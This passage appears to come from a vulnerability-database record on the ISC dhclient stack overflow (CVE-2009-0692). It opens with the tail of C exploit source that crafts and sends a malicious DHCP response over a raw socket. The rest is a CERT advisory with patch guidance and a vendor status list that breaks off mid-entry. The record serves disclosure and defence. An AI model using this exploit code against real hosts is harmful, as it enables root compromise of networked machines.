1;\r\n\tmemcpy(ptr, &payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, \"\\xff\", 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, \"\\xc1\\x1e\\x20\\x09\\x06\\x92\", ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, \"[-] error opening raw socket on %s\\n\", dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, \"usage: %s [-i interface]\\n\", argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, \"i:\")) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase 'i':\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, \"[-] couldn't find default interface: %s\\n\", errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, \"[-] couldn't open interface %s: %s\\n\", dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, \"[-] couldn't parse BPF filter: %s\\n\", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, \"[-] couldn't set BPF filter: %s\\n\", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf(\"[+] listening on %s: %s\\n\", dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10015/"}], "cert": [{"lastseen": "2018-12-25T20:18:19", "bulletinFamily": "info", "description": "### Overview \n\nThe ISC DHCP dhclient application contains a stack buffer overflow, which may allow a remote, unauthenticated attacker to execute arbitrary code with root privileges.\n\n### Description \n\nAs described in [RFC 2131](<http://www.faqs.org/rfcs/rfc2131.html>), \"The Dynamic Host Configuration Protocol (DHCP) provides a framework for passing configuration information to hosts on a TCP/IP network.\" ISC DHCP is a reference implementation of the DHCP protocol, including a DHCP server, client, and relay agent.\n\nThe ISC DHCP client code (dhclient) contains a stack buffer overflow in the `script_write_params()` method. dhclient fails to check the length of the server-supplied subnet-mask option before copying it into a buffer. According to ISC, the following versions are affected: \nDHCP 4.1 (all versions) \nDHCP 4.0 (all versions) \nDHCP 3.1 (all versions) \nDHCP 3.0 (all versions) \nDHCP 2.0 (all versions) \n \n--- \n \n### Impact \n\nA rogue DHCP server may be able to execute arbitrary code with root privileges on a vulnerable client system. \n \n--- \n \n### Solution \n\n**Apply a patch or update from your vendor**\n\nFor vendor-specific information regarding vulnerable status and patch availability, please see the Systems Affected section of this document. \n \n**Upgrade your version of DHCP** \n \nUpgrade your system as specified by your vendor. If you need to upgrade DHCP manually, [according to ISC](<https://www.isc.org/node/468>): \nUpgrade to 4.1.0p1, 4.0.1p1, or 3.1.2p1 \n \nThere are no fixes planned for DHCP 3.0 or DHCP 2.0, as those release trains have reached End-Of-Life. \n \n--- \n \n### Vendor Information\n\n410676\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Gentoo Linux \n\nNotified: June 23, 2009 Updated: July 14, 2009 \n\n**Statement Date: July 14, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nGentoo: vulnerable, fixed in net-misc/dhcp-3.1.1-r1\n\n### Vendor References\n\n<http://www.gentoo.org/security/en/glsa/glsa-200907-12.xml>\n\n### __ __ Internet Security Systems, Inc. \n\nNotified: June 23, 2009 Updated: July 15, 2009 \n\n**Statement Date: July 15, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nIBM Internet Security Systems has identified some ISS products that are vulnerable to CVE-2009-0692. Critical Product Updates, Security Patches, and Content Updates were made available on July 14, 2009 to fix the ISC DHCP Client vulnerability that affects multiple IBM ISS products.\n\nFor more information about the vulnerability including IBM ISS Intrusion Prevention/Intrusion Detection coverage for the issue, see the [ISC DHCP Client Buffer Overflow X-Force Protection Alert](<http://www.iss.net/threats/331.html>). \nFor more information about ISS product updates and patches including a list of affected products and versions, see [ISS Knowledgebase Article 5563](<https://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5563>).\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Vendor References\n\n<https://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5563\nhttp://www.iss.net/threats/331.html>\n\n### __ NetBSD \n\nNotified: June 23, 2009 Updated: July 15, 2009 \n\n**Statement Date: July 15, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Vendor References\n\n<http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-010.txt.asc>\n\n### Addendum\n\nPlease see [NetBSD-SA2009-010](<http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-010.txt.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23410676 Feedback>).\n\n### __ __ Red Hat, Inc. \n\nNotified: June 23, 2009 Updated: July 16, 2009 \n\n**Statement Date: June 30, 2009**\n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThis issue affected the dhcp packages as shipped with Red Hat Enterprise Linux 3 and 4. Updated packages to correct this issue are available via Red Hat Network:\n\n<https://rhn.redhat.com/errata/CVE-2009-0692.html> \n \nThis issue did not affect the dhcp packages as shipped with Red Hat Enterprise Linux 5 due to the use of FORTIFY_SOURCE protection mechanism that changes the exploitability of the issue into a controlled application termination.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Vendor References\n\n<https://rhn.redhat.com/errata/RHSA-2009-1136.html\nhttps://rhn.redhat.com/errata/CVE-2009-0692.html>\n\n### __ Ubuntu \n\nNotified: June 23, 2009 Updated: July 14, 2009 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.ubuntu.com/usn/usn-803-1>\n\n### Addendum\n\nPlease see: <http://www.ubuntu.com/usn/usn-803-1>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23410676 Feedback>).\n\n### __ Apple Inc. \n\nNotified: June 23, 2009 Updated: June 24, 2009 \n\n**Statement Date: June 23, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nApple does not ship dhclient in Mac OS X.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23410676 Feedback>).\n\n### __ Computer Associates eTrust Security Management \n\nNotified: June 23, 2009 Updated: June 25, 2009 \n\n**Statement Date: June 25, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ Force10 Networks, Inc. \n\nNotified: June 23, 2009 Updated: July 14, 2009 \n\n**Statement Date: July 15, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nForce10 Networks products are not vulnerable to this threat.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ Infoblox \n\nNotified: June 23, 2009 Updated: July 29, 2009 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nInfoblox is not vulnerable to this threat.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ Microsoft Corporation \n\nNotified: June 23, 2009 Updated: June 24, 2009 \n\n**Statement Date: June 24, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft's DHCP implementation is not vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23410676 Feedback>).\n\n### __ __ PePLink \n\nNotified: June 23, 2009 Updated: July 20, 2009 \n\n**Statement Date: June 24, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nPeplink products do not make use of ISC dhcpc.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ QNX, Software Systems, Inc. \n\nNotified: June 23, 2009 Updated: July 07, 2009 \n\n**Statement Date: July 07, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nQNX has investigated its DHCP client software and determined that both the QNX 4 and Neutrino Operating System DHCP client software is not vulnerable to the issue described in VU#410676.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ SafeNet \n\nNotified: June 23, 2009 Updated: July 03, 2009 \n\n**Statement Date: July 02, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSafeNet has reviewed its products and determined that none are vulnerable.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ SmoothWall \n\nNotified: June 23, 2009 Updated: June 25, 2009 \n\n**Statement Date: June 25, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nWe do not use the ISC DHCP client code and are therefore NOT VULNERABLE to any exploits in it.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ Sun Microsystems, Inc. \n\nNotified: June 23, 2009 Updated: June 26, 2009 \n\n**Statement Date: June 26, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSolaris DHCP client implementation is not vulnerable to the issue mentioned in CVE-2009-0692\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ The SCO Group \n\nNotified: June 23, 2009 Updated: June 30, 2009 \n\n**Statement Date: June 30, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nThe SCO Operating System implementations of DHCP are based on ISC DHCP and are not affected by this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ __ Wind River Systems, Inc. \n\nNotified: June 23, 2009 Updated: June 29, 2009 \n\n**Statement Date: June 29, 2009**\n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nVU#410676 is not applicable to Wind River VxWorks.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### __ 3com, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ ACCESS \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ AT&T \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Alcatel-Lucent \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Avaya, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Barracuda Networks \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Belkin, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Borderware Technologies \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Bro \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Charlotte's Web Networks \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Check Point Software Technologies \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Cisco Systems, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Clavister \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Computer Associates \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Conectiva Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Cray Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ D-Link Systems, Inc. \n\nNotified: June 26, 2009 Updated: June 26, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Debian GNU/Linux \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ DragonFly BSD Project \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ EMC Corporation \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Engarde Secure Linux \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Enterasys Networks \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Ericsson \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Extreme Networks \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ F5 Networks, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Fedora Project \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Fortinet, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Foundry Networks, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ FreeBSD, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Fujitsu \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Global Technology Associates \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Hewlett-Packard Company \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Hitachi \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ IBM Corporation \n\nNotified: June 25, 2009 Updated: June 24, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ IBM eServer \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ IP Filter \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Intel Corporation \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Internet Systems Consortium \n\nNotified: June 24, 2009 Updated: June 24, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Internet Systems Consortium - DHCP \n\nNotified: June 24, 2009 Updated: June 24, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Intoto \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Juniper Networks, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Luminous Networks \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Mandriva S. A. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ McAfee \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ MontaVista Software, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Multitech, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ NEC Corporation \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ NetApp \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Nokia \n\nNotified: June 25, 2009 Updated: June 25, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Nortel Networks, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Novell, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Openwall GNU/*/Linux \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Process Software \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Q1 Labs \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Quagga \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ RadWare, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Redback Networks, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ SUSE Linux \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Secureworx, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Silicon Graphics, Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Slackware Linux Inc. \n\nNotified: June 23, 2009 Updated: June 23, 2009 \n\n### 